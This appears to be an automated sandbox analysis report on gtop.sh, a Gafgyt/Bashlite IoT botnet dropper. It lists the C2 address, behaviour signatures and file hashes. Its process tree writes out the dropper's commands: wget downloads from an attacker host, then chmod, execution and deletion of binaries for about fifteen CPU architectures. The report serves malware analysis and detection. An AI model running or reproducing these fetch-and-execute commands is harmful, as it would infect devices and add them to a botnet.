Analysis

  • max time kernel
    91s
  • max time network
    93s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags
    arch:mips
    image:debian9-mipsbe-20240729-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    25-12-2024 15:52

General

  • Target

    gtop.sh

  • Size

    2KB

  • MD5

    297b82d777e2257fda8221703403b2d3

  • SHA1

    d1ebd4f576bf89adcdf9453879c3ae2adeeb42ed

  • SHA256

    7080f56e8be79f89d154730ffb07e9d9f22bb754c6ee295548593245bc21a1af

  • SHA512

    dc0fc05650eca6bde3d5b02568e68810c61e1b6b58f5bb31f4847ef4082cd63f7aae45db042ec4e7f659615e761dcd472c6b8e20abd6e8431a3bd0c0f2ecea81

Malware Config

Extracted

Family

gafgyt

C2

154.213.186.115:4444

Signatures

  • Detected Gafgyt variant (15 IoCs)
  • Gafgyt family
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification (1 TTPs, 15 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE (15 IoCs)
  • Reads system routing table (1 TTPs, 1 IoCs)

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration (1 TTPs, 1 IoCs)

    Uses contents of /proc filesystem to enumerate network settings.

  • System Network Configuration Discovery (1 TTPs, 9 IoCs)

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory (15 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/gtop.sh
    /tmp/gtop.sh
    1⤵
      PID:717
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:719
      • /bin/chmod
        chmod +x jackmymips
        2⤵
        • File and Directory Permissions Modification
        PID:735
      • /tmp/jackmymips
        ./jackmymips
        2⤵
        • Executes dropped EXE
        • Reads system routing table
        • Reads system network configuration
        • System Network Configuration Discovery
        PID:737
      • /bin/rm
        rm -rf jackmymips
        2⤵
        • System Network Configuration Discovery
        PID:741
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymips64
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:743
      • /bin/chmod
        chmod +x jackmymips64
        2⤵
        • File and Directory Permissions Modification
        PID:752
      • /tmp/jackmymips64
        ./jackmymips64
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:753
      • /bin/rm
        rm -rf jackmymips64
        2⤵
        • System Network Configuration Discovery
        PID:755
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmymipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:756
      • /bin/chmod
        chmod +x jackmymipsel
        2⤵
        • File and Directory Permissions Modification
        PID:757
      • /tmp/jackmymipsel
        ./jackmymipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:758
      • /bin/rm
        rm -rf jackmymipsel
        2⤵
        • System Network Configuration Discovery
        PID:760
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmysh4
        2⤵
        • Writes file to tmp directory
        PID:761
      • /bin/chmod
        chmod +x jackmysh4
        2⤵
        • File and Directory Permissions Modification
        PID:762
      • /tmp/jackmysh4
        ./jackmysh4
        2⤵
        • Executes dropped EXE
        PID:763
      • /bin/rm
        rm -rf jackmysh4
        2⤵
        PID:766
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmyx86
        2⤵
        • Writes file to tmp directory
        PID:768
      • /bin/chmod
        chmod +x jackmyx86
        2⤵
        • File and Directory Permissions Modification
        PID:777
      • /tmp/jackmyx86
        ./jackmyx86
        2⤵
        • Executes dropped EXE
        PID:778
      • /bin/rm
        rm -rf jackmyx86
        2⤵
        PID:781
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmyi486
        2⤵
        • Writes file to tmp directory
        PID:783
      • /bin/chmod
        chmod +x jackmyi486
        2⤵
        • File and Directory Permissions Modification
        PID:789
      • /tmp/jackmyi486
        ./jackmyi486
        2⤵
        • Executes dropped EXE
        PID:790
      • /bin/rm
        rm -rf jackmyi486
        2⤵
        PID:793
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmyi586
        2⤵
        • Writes file to tmp directory
        PID:795
      • /bin/chmod
        chmod +x jackmyi586
        2⤵
        • File and Directory Permissions Modification
        PID:812
      • /tmp/jackmyi586
        ./jackmyi586
        2⤵
        • Executes dropped EXE
        PID:814
      • /bin/rm
        rm -rf jackmyi586
        2⤵
        PID:818
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmyi686
        2⤵
        • Writes file to tmp directory
        PID:819
      • /bin/chmod
        chmod +x jackmyi686
        2⤵
        • File and Directory Permissions Modification
        PID:826
      • /tmp/jackmyi686
        ./jackmyi686
        2⤵
        • Executes dropped EXE
        PID:827
      • /bin/rm
        rm -rf jackmyi686
        2⤵
        PID:829
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmypowerpc
        2⤵
        • Writes file to tmp directory
        PID:830
      • /bin/chmod
        chmod +x jackmypowerpc
        2⤵
        • File and Directory Permissions Modification
        PID:832
      • /tmp/jackmypowerpc
        ./jackmypowerpc
        2⤵
        • Executes dropped EXE
        PID:833
      • /bin/rm
        rm -rf jackmypowerpc
        2⤵
        PID:835
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmym86k
        2⤵
        • Writes file to tmp directory
        PID:836
      • /bin/chmod
        chmod +x jackmym86k
        2⤵
        • File and Directory Permissions Modification
        PID:837
      • /tmp/jackmym86k
        ./jackmym86k
        2⤵
        • Executes dropped EXE
        PID:838
      • /bin/rm
        rm -rf jackmym86k
        2⤵
        PID:840
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmysparc
        2⤵
        • Writes file to tmp directory
        PID:841
      • /bin/chmod
        chmod +x jackmysparc
        2⤵
        • File and Directory Permissions Modification
        PID:842
      • /tmp/jackmysparc
        ./jackmysparc
        2⤵
        • Executes dropped EXE
        PID:843
      • /bin/rm
        rm -rf jackmysparc
        2⤵
        PID:845
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmyarmv4
        2⤵
        • Writes file to tmp directory
        PID:846
      • /bin/chmod
        chmod +x jackmyarmv4
        2⤵
        • File and Directory Permissions Modification
        PID:847
      • /tmp/jackmyarmv4
        ./jackmyarmv4
        2⤵
        • Executes dropped EXE
        PID:848
      • /bin/rm
        rm -rf jackmyarmv4
        2⤵
        PID:850
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmyarmv4tl
        2⤵
        • Writes file to tmp directory
        PID:851
      • /bin/chmod
        chmod +x jackmyarmv4tl
        2⤵
        • File and Directory Permissions Modification
        PID:855
      • /tmp/jackmyarmv4tl
        ./jackmyarmv4tl
        2⤵
        • Executes dropped EXE
        PID:857
      • /bin/rm
        rm -rf jackmyarmv4tl
        2⤵
        PID:859
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmyarmv5
        2⤵
        • Writes file to tmp directory
        PID:860
      • /bin/chmod
        chmod +x jackmyarmv5
        2⤵
        • File and Directory Permissions Modification
        PID:867
      • /tmp/jackmyarmv5
        ./jackmyarmv5
        2⤵
        • Executes dropped EXE
        PID:868
      • /bin/rm
        rm -rf jackmyarmv5
        2⤵
        PID:872
      • /usr/bin/wget
        wget http://141.95.84.4:1594/jackmyarmv6
        2⤵
        • Writes file to tmp directory
        PID:873
      • /bin/chmod
        chmod +x jackmyarmv6
        2⤵
        • File and Directory Permissions Modification
        PID:880
      • /tmp/jackmyarmv6
        ./jackmyarmv6
        2⤵
        • Executes dropped EXE
        PID:881
      • /bin/rm
        rm -rf jackmyarmv6
        2⤵
        PID:884

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/jackmyarmv4
    Filesize
    167KB
    MD5
    d00be981681e272f97c7ae6e0d72a679
    SHA1
    76e316df4e70371cc1a0e1a718c4a148564ca13b
    SHA256
    2359a71e62d525ef2cc8041db19e15a51eb3201692869b7a75bd6d9977b84f08
    SHA512
    0ab8f509f9197c2130bb7bc36bc5de6f23d6c55a793158d1c8b2e9eff49d8b8bc69ac7edb994f78728f72de6e874af47bd7a84e36162e79dadcc0c7ba75271e0

  • /tmp/jackmyarmv4tl
    Filesize
    166KB
    MD5
    8701802700912d0bc573d75d76bf4d30
    SHA1
    bcf66b86849b6c6a5977a102c67737723d9ace0d
    SHA256
    d338bd034f546e5756e2ebb0def390b32a13565a10e821ca8eee2eaa5468c07f
    SHA512
    74bd2a2a81f2dec0fa278d1aa02bfa20be97884fb7ccd2ccf4aaf2dfa07cbcc5314f7d1125c730a5209ef3abbeec7cc9e672fe32e8359522c9487f28f8bd5c7f

  • /tmp/jackmyarmv5
    Filesize
    166KB
    MD5
    795d887687193140ee04711c54574ab5
    SHA1
    35ac21f15d9be9c9da1b22acefefbf466ad154f4
    SHA256
    f25d5d4a126acb25c26694b0d37455b757f6607a9bc33ee4a71f50b5506292a5
    SHA512
    5c687bcb950fae7738c4b65f67a0612f1f86338b92867deb1611b9483dfbc04b202edd158a9108be5d55350b717a64922050965e48907ff8066542eb4534c614

  • /tmp/jackmyarmv6
    Filesize
    166KB
    MD5
    f8267e8d44d86203d2560d280b66bd36
    SHA1
    5a1c5e5caeacdf01af8c44bcbe1625b7ad0eb0fb
    SHA256
    a3360319b5713fa0352e837562c56a8fa34ff656a506763ca7e809d120e57980
    SHA512
    7b7398311260831b8428e76c46f31297dbfcae42c5c41c87c0644892854b0477406641bd0d5e7af03c7190a8fac38ac0c3cded5341f4f07dbfb974b8275b934e

  • /tmp/jackmyi486
    Filesize
    126KB
    MD5
    37bc4b1d4fce9500ee4fee154e61d9e6
    SHA1
    6fddc8858547e60672cca66857ceb7293638a057
    SHA256
    72071458112606424f8eb5e064a29f4ab4016d3971da7f89e62785abeb9cbb9c
    SHA512
    3db6d2ed8a079792d9fc024a9e98a7cf6959ca446c4944726707c48a93775c5b40b2b9d46150a287561a4fdc6a1aa21310d8271ac521b40a733d15f07623d8eb

  • /tmp/jackmyi586
    Filesize
    135KB
    MD5
    4ca387e1408f29f6ed1979acfb671f82
    SHA1
    3467879b5fd631a5884f947ba013d61ea8a33c91
    SHA256
    1f7ba28d9d2ea091a89b2f7e4131b76163a6dcfb696cc34b073de8c9bf8afc4d
    SHA512
    18995f38839a98d0d478dad4b4b000e478effd1acaea865a5e947454e1d17d296ae519556f1a30f875b505f38f298440d20ff988440457907d5dd3ae9492c738

  • /tmp/jackmyi686
    Filesize
    139KB
    MD5
    1aeb2935aec67978bfdab8243470b577
    SHA1
    b26b260d86609e9c758279c59eb8caec53fd0f69
    SHA256
    936937cb11ad426210af65f850f4afee5713e324ad703a12d0b5f687ea84cf57
    SHA512
    3843063e037212bc1a60b67a69407cb466ee67d6d9935018f7fcebe5536c4be078cc797865cdfafd2f9073cec8c6425546089aee641d3788b61f4238a15748ce

  • /tmp/jackmym86k
    Filesize
    155KB
    MD5
    a26f6fdf41bb8e4034409fb84adc83ba
    SHA1
    8c03a273bdd2e8f54994d0d061fe259a2968ff41
    SHA256
    7911664055520934019ddfa554219500fa5a038268c828a02b05aa6ad198fbbd
    SHA512
    dcdf2befd602bee0a56c2a05e01171cb24aada733531e479b157ccb8a6d494c3c1fcaa261b813e4eedc498bdc3ba5664e6e3b4c42ce713cfe2d5a5dcc27cb897

  • /tmp/jackmymips
    Filesize
    199KB
    MD5
    f2ab2725ea6c883a5c608bc365c41fe5
    SHA1
    454d6983d9a7bb59aa0441b2c2cc805a97738e66
    SHA256
    531e818ee346f15e78c4f08d8de52a64597e10ce744b1be9dd2137eb1cd78c1d
    SHA512
    572183decc9a9ee8878e77485db9a22b6b0606e667743788eb5f5b1f8f35522505c216fe027931fa8913989053fa346b46b78c6b2209ecd53630bbc14e1d3a26

  • /tmp/jackmymips64
    Filesize
    244KB
    MD5
    89655c0a64c3552ee71dc901a3561ad1
    SHA1
    8a488927882c18b5a35da06c6428f8707d4314ad
    SHA256
    08d4aed11bff7d311aa206396b2651f2e587e0fbe41d2688281ad4e0f6322d04
    SHA512
    23c581fe1ca57cc3dc9a7efeeee4d97eb5f97ac92ed3cf1f4af4e8d2caa467aa6e826a29f01a67b9dcc8609e77e76e9d23ee985f770fada89a9acab484c9af6f

  • /tmp/jackmymipsel
    Filesize
    199KB
    MD5
    caabd697c443462f0a04d6b30529df58
    SHA1
    4fcb97074d1971ebfa482aad5edf208b43b6d819
    SHA256
    5259f289b8841e6beb9718c486210857edac40b5c206e5949fa5402b861849cf
    SHA512
    abf9607d8d332eca40f19ffef0866414fa353f12663c3dd232dd190954ab4f401f69cc9e84f669910c801a30df62bba8f00425aac5b1bfd99e756bdd4277a1a8

  • /tmp/jackmypowerpc
    Filesize
    150KB
    MD5
    29f174a35d868d69945c412c159184dd
    SHA1
    7ac1d35bdbe15fed8443341de0875579ec8099d0
    SHA256
    b9966986b49c8db77d7909f17e743e4e7f6df00379a990467d62db55c69a3b7b
    SHA512
    6047582863aca61d2e8925f2fa6e4cc4eecdcd4095b76ea276e9489f7da1fc54503a01370f4f2f4553d144818cfa6b8324fdf772d92ecdcca57465904f012899

  • /tmp/jackmysh4
    Filesize
    146KB
    MD5
    2a8e0da501cea8f8d32893a5fd6c9aab
    SHA1
    29b2be373b4155632926b9656861bebd53264473
    SHA256
    17f492bbf1085e3cec77c8b46831a7d2ef4662d0162377358e17296bebbb08d1
    SHA512
    64764a34cd7e8b7be0220519910b6f5a7e3c47340e45450e4e368515dca6c73ab3bbe11726f380533e11bc4ec840838d73a5dcc4720c93c96bb2b1444eedf6c7

  • /tmp/jackmysparc
    Filesize
    167KB
    MD5
    8ad1c29bcb5557ee83c64f35b9b46b2e
    SHA1
    0fabfb4c79ff14fdacef575b3728561a8e557a77
    SHA256
    d44b79302f6bb77b6432c8074582a5e2df2c9d24404bc3dc17441f59e22284ca
    SHA512
    a3c8a68708056e0cd4aa9d5cae1c865eb381ec62f316aab48e38cdcb4ef0be3abc8daf30e4c888766211c2eaa433c7fe15e85efd3b14b35a5f3de5ab6e2ac2e6

  • /tmp/jackmyx86
    Filesize
    156KB
    MD5
    afcb3a143b9f4e3a985c3eeb2e2ae4c8
    SHA1
    295f0e0380f71feb1c8911e29882db6a792bbd58
    SHA256
    fd0b10b636f99ee5e527b266d917c41d33230ad6bf600454e10b3e106db1031c
    SHA512
    b6124a40e8a5e7ff49df9b11e3b5097ac9e81b76c6146d902600f50de431e535136d22d63a34736b3fc53121ad0fa2d6b00af18b1ce834997c94c8eb288f5b08